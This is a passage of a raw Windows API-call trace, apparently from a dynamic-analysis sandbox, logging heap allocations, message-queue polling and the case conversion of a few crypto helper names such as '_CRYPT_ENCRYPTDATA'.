0x9c27a8 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2f3c) returned 0x900190 [0198.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0198.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0198.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.576] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0198.576] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.576] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0198.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2f3c) returned 0x900190 [0198.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0198.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0198.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2f3c) returned 0xbea018 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0198.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0198.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0198.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0198.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0198.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0198.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0198.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.579] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0198.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2888 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0198.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0198.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.579] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0198.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.580] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0198.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.581] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0198.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0198.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0198.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0198.582] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.582] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0198.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0198.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0198.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0198.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 